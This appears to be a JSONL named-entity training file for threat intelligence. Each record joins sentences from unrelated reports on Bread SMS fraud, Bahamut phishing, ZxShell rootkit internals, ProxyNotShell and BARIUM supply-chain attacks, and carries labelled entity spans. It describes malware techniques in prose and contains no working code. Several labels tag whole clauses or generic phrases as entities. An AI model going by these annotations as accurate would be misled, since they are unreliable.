{"text": "Two strings are passed into the call , the shortcode and keyword used for SMS billing ( getter methods renamed here for clarity ) . In contrast to many other APT campaigns , which tend to rely heavily on spear phishing to gain victims , \" th3bug \" is known for compromising legitimate websites their intended visitors are likely to frequent . Uninstall Uninstall and terminate ZxShell bot DLL . The exploits were sourced from different VPN provider IP addresses and previously compromised third - party devices .", "spans": [{"start": 377, "end": 384, "label": "Malware"}, {"start": 389, "end": 392, "label": "System"}, {"start": 436, "end": 448, "label": "System"}, {"start": 449, "end": 461, "label": "System"}, {"start": 466, "end": 512, "label": "Organization"}]}
{"text": "In the native library , it stores the strings to access the SMS API . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . ShareShell Share a shell to other . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": [{"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 173, "end": 192, "label": "Vulnerability"}, {"start": 211, "end": 221, "label": "Organization"}]}
{"text": "The nativesend method uses the Java Native Interface ( JNI ) to fetch and call the Android SMS API . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . CloseFW Switch off Windows Firewall . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": [{"start": 83, "end": 90, "label": "System"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 151, "end": 168, "label": "Vulnerability"}, {"start": 247, "end": 254, "label": "System"}]}
{"text": "The following is a screenshot from IDA with comments showing the strings and JNI functions . Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers . FileMG File Manager . winvnc Remote Desktop . rPortMap Port Forwarding . capsrv Video Device Spying . zxplug Add and load a ZxShell custom plugin . Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": [{"start": 297, "end": 315, "label": "Organization"}, {"start": 442, "end": 449, "label": "Malware"}, {"start": 466, "end": 478, "label": "Organization"}, {"start": 529, "end": 536, "label": "Organization"}, {"start": 543, "end": 558, "label": "Organization"}, {"start": 597, "end": 618, "label": "Organization"}]}
{"text": "WebView JavaScript Interface Continuing on the theme of cross-language bridges , Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 . This set of functionality allows the operator complete control of a system . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": [{"start": 81, "end": 86, "label": "Malware"}, {"start": 211, "end": 247, "label": "Organization"}, {"start": 361, "end": 370, "label": "Organization"}]}
{"text": "The following method is declared in the DEX . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk . Being able to transfer and execute files on the infected system means the attacker can run any code they please . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month \u2019s most active ransomware gang .", "spans": [{"start": 128, "end": 153, "label": "Organization"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 453, "end": 457, "label": "Organization"}, {"start": 505, "end": 512, "label": "Organization"}]}
{"text": "Without context , this method does not reveal much about its intended behavior , and there are no calls made to it anywhere in the DEX . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Further , the keylogging and remote desktop functionality allows the operator to spy on the infected machine , observing all keystrokes and viewing all user actions . It allows security researchers to analyze the source code and understand the attacker \u2019s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": [{"start": 199, "end": 206, "label": "Organization"}]}
{"text": "However , the app does create a WebView and registers a JavaScript interface to this class . Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data . Unloads ZxShell and deletes all of the active components . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 128, "end": 155, "label": "System"}, {"start": 351, "end": 358, "label": "Malware"}, {"start": 414, "end": 430, "label": "Vulnerability"}, {"start": 454, "end": 457, "label": "Organization"}]}
{"text": "This gives JavaScript run in the WebView access to this method . Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . This simply deletes the ZxShell service key from the Windows registry ( using SHDeleteKey Api ) and all of the subkeys . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 65, "end": 72, "label": "Organization"}, {"start": 134, "end": 149, "label": "System"}, {"start": 266, "end": 273, "label": "Malware"}, {"start": 295, "end": 302, "label": "System"}, {"start": 376, "end": 392, "label": "Vulnerability"}, {"start": 467, "end": 483, "label": "Vulnerability"}]}
{"text": "The app loads a URL pointing to a Bread-controlled server . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Finally , it marks ZxShell main Dll for deletion with the MoveFileEx Windows API . TIEDYE supports the following protocols : tcp , tcp6 , udp , upd6 , http , https , proxy_socks4 , proxy_socks4a , pipe , ssl , ssl3 , and rdp .", "spans": [{"start": 122, "end": 129, "label": "Organization"}, {"start": 251, "end": 258, "label": "Malware"}, {"start": 264, "end": 267, "label": "System"}, {"start": 301, "end": 308, "label": "System"}, {"start": 315, "end": 321, "label": "Malware"}, {"start": 357, "end": 360, "label": "System"}, {"start": 363, "end": 367, "label": "System"}, {"start": 370, "end": 373, "label": "System"}, {"start": 376, "end": 380, "label": "System"}, {"start": 383, "end": 387, "label": "System"}, {"start": 390, "end": 395, "label": "System"}, {"start": 398, "end": 410, "label": "System"}, {"start": 413, "end": 426, "label": "System"}, {"start": 429, "end": 433, "label": "System"}, {"start": 436, "end": 439, "label": "System"}, {"start": 442, "end": 446, "label": "System"}, {"start": 453, "end": 456, "label": "System"}]}
{"text": "The response contains some basic HTML and JavaScript . Several times , APT5 has targeted organizations and personnel based in Southeast Asia . This function is the supporting functionality for WinVNC . \u201c So good luck , I \u2019m sure we \u2019ll talk again soon , but for now , I ve got better things in the oven , \u201d Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated .", "spans": [{"start": 71, "end": 75, "label": "Organization"}, {"start": 89, "end": 102, "label": "Organization"}, {"start": 107, "end": 116, "label": "Organization"}, {"start": 193, "end": 199, "label": "System"}, {"start": 307, "end": 315, "label": "Organization"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 369, "end": 383, "label": "Organization"}]}
{"text": "In green , we can see the references to the SMS API . However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before . To allow the VNC session to connect , the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001 . zxFunction001 modifies the current process memory , uses data contained in the named pipe to create a socket , and then executes the code that sends the remote desktop session to the server controller . The rare opportunity to examine Sharpshooter 's backend operations allowed the researchers to create a fuller picture of the activity and interaction between the various tools used by the threat actor .", "spans": [{"start": 244, "end": 247, "label": "System"}, {"start": 296, "end": 311, "label": "System"}, {"start": 617, "end": 651, "label": "System"}]}
{"text": "In red , we see those values being passed into the suspicious Java method through the registered interface . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation . ZxFunction002 This will either bind the calling process to a port or has the calling process connect to a remote host . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 486, "end": 533, "label": "Vulnerability"}]}
{"text": "Now , using these strings method1 can use reflection to call sendTextMessage and process the payment . As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition . The functionality ( connect or bind ) depends on the data contained within the named pipe . This has been coined as the Mark Heptad yes after this author and creator .", "spans": [{"start": 363, "end": 374, "label": "Organization"}]}
{"text": "PACKING In addition to implementing custom obfuscation techniques , apps have used several commercially available packers including : Qihoo360 , AliProtect and SecShell . In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent . Unlike zxFunction001, this is not used by The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870 - 5 - 104 protocol for TCP / IP connections or the IEC-60870 - 5 - 101 protocol for serial connections .", "spans": [{"start": 134, "end": 142, "label": "System"}, {"start": 145, "end": 155, "label": "System"}, {"start": 160, "end": 168, "label": "System"}, {"start": 212, "end": 219, "label": "System"}, {"start": 268, "end": 296, "label": "System"}, {"start": 381, "end": 398, "label": "System"}]}
{"text": "More recently , we have seen Bread-related apps trying to hide malicious code in a native library shipped with the APK . After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) . any of the RAT commands in the zxshell.dll . There are several indicators of compromise that organizations should monitor .", "spans": [{"start": 29, "end": 42, "label": "Malware"}, {"start": 285, "end": 290, "label": "System"}, {"start": 320, "end": 323, "label": "System"}, {"start": 340, "end": 351, "label": "Indicator"}]}
{"text": "Earlier this year , we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using DexClassLoader . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region . Apart from user-mode ZxShell droppers mentioned earlier , there is a file ( SHA256 : 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 ) that installs a kernel device driver called loveusd.sys . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 396, "end": 403, "label": "Malware"}, {"start": 460, "end": 524, "label": "Indicator"}, {"start": 571, "end": 582, "label": "Indicator"}, {"start": 735, "end": 760, "label": "System"}]}
{"text": "The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption . As a result , it is already flagged as Bahamut by antivirus engines . The architecture of this dropper is different from the others : it starts extracting the main driver from itself . A new report from the Malwarebytes Threat Intelligence team shows 1,900 total ransomware attacks within just four countries \u2014 the US , Germany , France , and the UK \u2014 in one year .", "spans": [{"start": 369, "end": 406, "label": "Organization"}]}
{"text": "After we blocked those samples , they moved a significant portion of malicious functionality into the native library , which resulted in a rather peculiar back and forth between Dalvik and native code : COMMAND & CONTROL Dynamic Shortcodes & Content Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers . It adds the SeLoadDriver privilege to its access token and proceeds to install the driver as a fake disk filter driver . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": [{"start": 547, "end": 565, "label": "Organization"}, {"start": 580, "end": 592, "label": "System"}, {"start": 710, "end": 719, "label": "Malware"}]}
{"text": "In the example server response below , the green fields show text to be shown to the user . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . It then adds the \u201c Loveusd.sys \u201d extracted driver name to the upper filter list . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 276, "end": 295, "label": "System"}, {"start": 317, "end": 328, "label": "Indicator"}, {"start": 447, "end": 472, "label": "System"}]}
{"text": "The red fields are used as the shortcode and keyword for SMS billing . Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . In our analysed sample the \u201c Loveusd.sys \u201d driver is installed with the name \u201c USBHPMS \u201d . In some cases , the threat actors may have been using compromised organizations to gain access to other victims in supplychaintype attacks .", "spans": [{"start": 248, "end": 259, "label": "Indicator"}, {"start": 298, "end": 305, "label": "Indicator"}, {"start": 330, "end": 343, "label": "Organization"}]}
{"text": "State Machines Since various carriers implement the billing process differently , Bread has developed several variants containing generalized state machines implementing all possible steps . Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" flash text \" . Finally the driver is started using the ZwLoadDriver native API . Most of the time , unsolicited messages from various people are the first entry point .", "spans": [{"start": 82, "end": 87, "label": "Malware"}, {"start": 289, "end": 295, "label": "Organization"}]}
{"text": "At runtime , the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address . The ZxShell driver starts by acquiring some kernel information and then hooking \u201c ObReferenceObjectByHandle \u201d API . UNC4899 's targeting is selective , and they have been observed gaining access to victim networks through JumpCloud .", "spans": [{"start": 310, "end": 317, "label": "Malware"}, {"start": 422, "end": 442, "label": "Organization"}, {"start": 528, "end": 537, "label": "System"}]}
{"text": "The configuration contains a list of steps to execute with URLs and JavaScript . We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations . Finally it spawns 2 system threads . I will use Qiling in the emulation .", "spans": [{"start": 111, "end": 118, "label": "Organization"}, {"start": 339, "end": 345, "label": "System"}]}
{"text": "The steps implemented include : Load a URL in a WebView Run JavaScript in WebView Toggle WiFi state Toggle mobile data state Read/modify SMS inbox Solve captchas Captchas One of the more interesting states implements the ability to solve basic captchas ( obscured letters and numbers ) . Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations \u2013 not destructive attacks or fraud . The first thread is the \u201c communication \u201d thread . If executed successfully , LIGHTWORK provides the operator the following command - line output : Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis .", "spans": [{"start": 299, "end": 306, "label": "Organization"}, {"start": 449, "end": 462, "label": "System"}, {"start": 501, "end": 510, "label": "Malware"}]}
{"text": "First , the app creates a JavaScript function to call a Java method , getImageBase64 , exposed to WebView using addJavascriptInterface . The targets and themes of Bahamut 's campaigns have consistently fallen within two regions \u2013 South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) . ZxShell employs a strange method for communication : it hooks the NtWriteFile API and recognizes 5 different special handle values as commands : In this blog post , we show how the newly found Kritec skimmer was found along side one of its competitors .", "spans": [{"start": 334, "end": 341, "label": "Malware"}, {"start": 527, "end": 541, "label": "Malware"}]}
{"text": "The value used to replace GET_IMG_OBJECT comes from the JSON configuration . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted . 0x111111111 : Hide \u201c Loveusd \u201d driver from the system kernel driver list . 0x22222222 : Securely delete an in-use or no-access target file-name . 0x44444444 : Unhook the ZwWriteFile API and hook KiFastCallEntry . 0x55555555 : Remove the ZxShell Image Load Notify routine . 0x88888888 : Set a special value called \u201c type \u201d in Windows registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverMain . Ukraine \u2019s Computer Emergency Response Team ( CERT - UA ) has attributed the July campaign to the threat actor group UNC1151 , as a part of the GhostWriter operational activities allegedly linked to the Belarusian government .", "spans": [{"start": 250, "end": 265, "label": "System"}, {"start": 520, "end": 527, "label": "Malware"}, {"start": 608, "end": 615, "label": "System"}, {"start": 689, "end": 732, "label": "Organization"}, {"start": 735, "end": 744, "label": "Organization"}, {"start": 806, "end": 813, "label": "Organization"}, {"start": 833, "end": 867, "label": "Organization"}, {"start": 888, "end": 915, "label": "Organization"}]}
{"text": "The app then uses JavaScript injection to create a new script in the carrier \u2019 s web page to run the new function . Bahamut targeted similar Qatar-based individuals during their campaign . The second Loveusd system thread does a lot of things . In other news , a suspected LockBit affiliate named Ruslan Magomedovich Astamirov , a 20 - year - old from the Chechen Republic , was arrested in Arizona last month .", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 200, "end": 207, "label": "System"}, {"start": 273, "end": 280, "label": "Organization"}, {"start": 297, "end": 326, "label": "Organization"}]}
{"text": "The base64-encoded image is then uploaded to an image recognition service . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc . Its principal duties are to create the ZxShell main DLL in \u201c c:\\Windows\\System32\\commhlp32.dll \u201d and to install the Kernel \u201c Load Image Notify routine \u201d . We provide at - risk organizations with the following discovery methods to conduct threat hunts for tactics , techniques , and procedures ( TTPs ) implemented derived from the toolset : \u2022 Establish collection and aggregation of host - based logs for crown jewels systems such as human - machine interfaces ( HMI ) , engineering workstations ( EWS ) , and OPC client servers within their environments and review logs for the evidence of Python script or unauthorized code execution on these systems .", "spans": [{"start": 76, "end": 86, "label": "Organization"}, {"start": 155, "end": 170, "label": "Malware"}, {"start": 208, "end": 238, "label": "Malware"}, {"start": 280, "end": 287, "label": "Malware"}, {"start": 293, "end": 296, "label": "System"}, {"start": 302, "end": 335, "label": "Indicator"}, {"start": 366, "end": 391, "label": "System"}, {"start": 412, "end": 430, "label": "Organization"}, {"start": 675, "end": 707, "label": "System"}, {"start": 712, "end": 736, "label": "System"}, {"start": 739, "end": 742, "label": "System"}, {"start": 751, "end": 795, "label": "System"}, {"start": 820, "end": 893, "label": "Indicator"}]}
{"text": "If the text is retrieved successfully , the app uses JavaScript injection again to submit the HTML form with the captcha answer . The China-backed BARIUM APT is suspected to be at the helm of the project . The code then tries to kill each process and service that belongs to the following list of AV products : Symantec B-TOOL S-IDTY Firewall Norton ESET McAfee Avast Avira Sophos Malwarebytes . The name of the shortcut file , depending on the campaign , is either randomly generated by a random string generator function or hardcoded in the macro code .", "spans": [{"start": 343, "end": 349, "label": "System"}, {"start": 350, "end": 354, "label": "System"}, {"start": 355, "end": 361, "label": "System"}, {"start": 362, "end": 367, "label": "System"}, {"start": 368, "end": 373, "label": "System"}, {"start": 374, "end": 380, "label": "System"}, {"start": 381, "end": 393, "label": "System"}, {"start": 466, "end": 522, "label": "Organization"}, {"start": 526, "end": 553, "label": "Organization"}]}
{"text": "CLOAKING Client-side Carrier Checks In our basic command & control example above , we didn \u2019 t address the ( incorrectly labeled ) \u201c imei \u201d field . Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers \u2013 which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab . Next , the ZxShell Load-Image Notify function prevents the AV processes from restarting . The gang attacked 10 victims last month , the majority of them being from the Information and Communications Technology ( ICT ) sectors .", "spans": [{"start": 393, "end": 406, "label": "Organization"}, {"start": 420, "end": 427, "label": "Malware"}, {"start": 577, "end": 634, "label": "Organization"}]}
{"text": "This contains the Mobile Country Code ( MCC ) and Mobile Network Code ( MNC ) values that the billing process will work for . Kaspersky Lab To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The installation procedure continues in the user-mode dropper . A survey conducted by security firm OneLogin found that only about half of IT decision makers were very confident that former employees were no longer able to access corporate applications .", "spans": [{"start": 126, "end": 139, "label": "Organization"}, {"start": 168, "end": 181, "label": "Organization"}, {"start": 474, "end": 482, "label": "Organization"}, {"start": 494, "end": 626, "label": "Vulnerability"}]}
{"text": "In this example , the server response contains several values for Thai carriers . To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The ZxShell service is installed as usual , and the in-execution dropper is deleted permanently using the special handle value 0x22222222 for the WriteFile API call . Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": [{"start": 110, "end": 123, "label": "Organization"}, {"start": 308, "end": 315, "label": "Malware"}, {"start": 471, "end": 490, "label": "Malware"}, {"start": 499, "end": 714, "label": "Malware"}]}
{"text": "The app checks if the device \u2019 s network matches one of those provided by the server . BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines . This handle value is invalid : all the windows kernel handle values are by design a multiple of 4 . It has an interesting way of loading the malicious JavaScript we had not seen before either .", "spans": [{"start": 87, "end": 93, "label": "Organization"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}, {"start": 162, "end": 165, "label": "Organization"}, {"start": 197, "end": 206, "label": "System"}, {"start": 211, "end": 219, "label": "System"}, {"start": 279, "end": 295, "label": "System"}, {"start": 360, "end": 367, "label": "System"}]}
{"text": "If it does , it will commence with the billing process . That said , the \" fingerprints \" left on the samples by the attackers \u2013 including techniques used to achieve unauthorized code execution \u2013 suggest that the BARIUM APT is behind the effort , according to the researchers . The ZxShell hook code knows that and intercept it . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 213, "end": 223, "label": "Organization"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 368, "end": 388, "label": "Organization"}, {"start": 417, "end": 443, "label": "Organization"}, {"start": 494, "end": 512, "label": "System"}]}
{"text": "If the value does not match , the app skips the \u201c disclosure \u201d page and billing process and brings the user straight to the app content . In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor . ObReferenceObjectByHandle is a Kernel routine designed to validate a target object and return the pointer to its object body ( and even its handle information ) , starting from the object handle ( even the user-mode one ) . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 201, "end": 236, "label": "Organization"}, {"start": 576, "end": 795, "label": "Malware"}, {"start": 895, "end": 1074, "label": "Malware"}]}
{"text": "In some versions , the server would only return valid responses several days after the apps were submitted . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor . The hook installed by ZxShell implements one of its filtering routine . A full report describing the timeline of DUCKTAIL \u2019s activities , a detailed analysis of its malware component , and appendices containing indicators of compromise , Yara detection rules , metadata , and MITRE ATT&CK techniques can be downloaded from a link on this page .", "spans": [{"start": 147, "end": 163, "label": "System"}, {"start": 288, "end": 306, "label": "System"}, {"start": 331, "end": 338, "label": "Malware"}, {"start": 422, "end": 433, "label": "Organization"}, {"start": 474, "end": 481, "label": "Malware"}, {"start": 547, "end": 551, "label": "Organization"}, {"start": 585, "end": 597, "label": "Organization"}]}
{"text": "Server-side Carrier Checks In the JavaScript bridge API obfuscation example covered above , the server supplied the app with the necessary strings to complete the billing process . NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong . It filters each attempt to open the ZxShell protected driver or the main DLL , returning a reference to the \u201c netstat.exe \u201d file . Figure 11 : Sandworm TANKTRAP GPO 2", "spans": [{"start": 404, "end": 411, "label": "Malware"}, {"start": 441, "end": 444, "label": "System"}, {"start": 478, "end": 489, "label": "Indicator"}, {"start": 511, "end": 532, "label": "Malware"}]}
{"text": "However , analysts may not always see the indicators of compromise in the server \u2019 s response . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer . The protection is enabled to all processes except for ones in the following list : Svchost.exe , Lsass.exe , Winlogon.exe , Services.exe , Csrss.exe , ctfmon.exe , Rundll32.exe , mpnotify.exe , update.exe . The first with a valid handle to close the process created .", "spans": [{"start": 180, "end": 202, "label": "Organization"}, {"start": 224, "end": 251, "label": "Organization"}, {"start": 444, "end": 455, "label": "Indicator"}, {"start": 458, "end": 467, "label": "Indicator"}, {"start": 470, "end": 482, "label": "Indicator"}, {"start": 485, "end": 497, "label": "Indicator"}, {"start": 500, "end": 509, "label": "Indicator"}, {"start": 512, "end": 522, "label": "Indicator"}, {"start": 525, "end": 537, "label": "Indicator"}, {"start": 540, "end": 552, "label": "Indicator"}, {"start": 555, "end": 565, "label": "Indicator"}, {"start": 568, "end": 628, "label": "Malware"}]}
{"text": "In this example , the requests to the server take the following form : Here , the \u201c operator \u201d query parameter is the Mobile Country Code and Mobile Network Code . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks . If the type of the object that the system is trying to validate is a process , the hook code rewrites again the configuration data of the ZxShell service in the windows registry . \u201c s1.txt \u201d , which likely contains the unauthorized MicroSCADA commands", "spans": [{"start": 293, "end": 302, "label": "Organization"}, {"start": 346, "end": 358, "label": "Organization"}, {"start": 435, "end": 444, "label": "Organization"}, {"start": 632, "end": 639, "label": "Malware"}, {"start": 655, "end": 662, "label": "System"}, {"start": 674, "end": 745, "label": "Indicator"}]}
{"text": "The server can use this information to determine if the user \u2019 s carrier is one of Bread \u2019 s targets . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 83, "end": 88, "label": "Malware"}, {"start": 176, "end": 183, "label": "Organization"}, {"start": 199, "end": 218, "label": "Malware"}, {"start": 360, "end": 367, "label": "Malware"}, {"start": 442, "end": 459, "label": "Organization"}, {"start": 508, "end": 518, "label": "System"}]}
{"text": "If not , the response is scrubbed of the strings used to complete the billing fraud . Althoughthe BariumDefendants have relied on differentand distinct infrastructures in an effortto evade detection , Bariumused the same e-mail address (hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers . In this manner , ZxShell is able to completely hide itself , intercepting the following Kernel API calls : ZwAllocateVirtualMemory , ZwOpenEvent , ZwQueryDirectoryFile , ZwWriteFile , ZwEnumerateKey , and ZwDeviceIoControlFile . CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment .", "spans": [{"start": 339, "end": 345, "label": "Organization"}, {"start": 409, "end": 416, "label": "Malware"}, {"start": 621, "end": 631, "label": "Malware"}, {"start": 637, "end": 666, "label": "Malware"}]}
{"text": "MISLEADING USERS Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure , showing terms and conditions or a confirm button . The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update . Command and Control Server : Sample ( SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c ) is configured to act as a server . Please address comments about this page to nvd@nist.gov .", "spans": [{"start": 17, "end": 22, "label": "Malware"}, {"start": 238, "end": 247, "label": "System"}, {"start": 270, "end": 276, "label": "Organization"}, {"start": 311, "end": 340, "label": "Organization"}, {"start": 365, "end": 384, "label": "System"}, {"start": 412, "end": 476, "label": "Indicator"}, {"start": 557, "end": 569, "label": "Organization"}]}
{"text": "However , the actual text would often only display a basic welcome message . To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites . The symbol \u201c g_bCreateListenSck \u201d is set to 1 . Of the two file types , the PowerPoint files are more unusual in that they would not show any actual slides when opened , but would still execute the malicious VBA code , a finding consistent with CERT - UA \u2019s analysis .", "spans": [{"start": 150, "end": 156, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 403, "end": 445, "label": "Malware"}]}
{"text": "Other versions included all the pieces needed for a valid disclosure message . Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within HumanResources or Business Developmentdepartments ofthe targeted organizations in order to compromise the computers ofsuch individuals . This means that , as seen above , the ZxShell Dll is started in listening mode . The videos were quickly passed around offices while users \u2019 systems were silently infected in the background , and many of the APT \u2019s components were signed with phony Intel and AMD digital certificates .", "spans": [{"start": 131, "end": 137, "label": "Organization"}, {"start": 353, "end": 360, "label": "Malware"}, {"start": 361, "end": 364, "label": "System"}]}
{"text": "However , there are still two issues here : The numbers to contact for cancelling the subscription are not real The billing process commences even if you don \u2019 t hit the \u201c Confirm \u201d button Even if the disclosure here displayed accurate information , the user would often find that the advertised functionality of the app did not match the actual content . The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques . It connects to the first remote C&C that tries to contact it and succeeds in the handshake . When combined with the data from your vulnerability scanners , it delivers a full picture of the exposures in your environment .", "spans": [{"start": 422, "end": 429, "label": "System"}, {"start": 438, "end": 444, "label": "System"}, {"start": 555, "end": 558, "label": "System"}]}
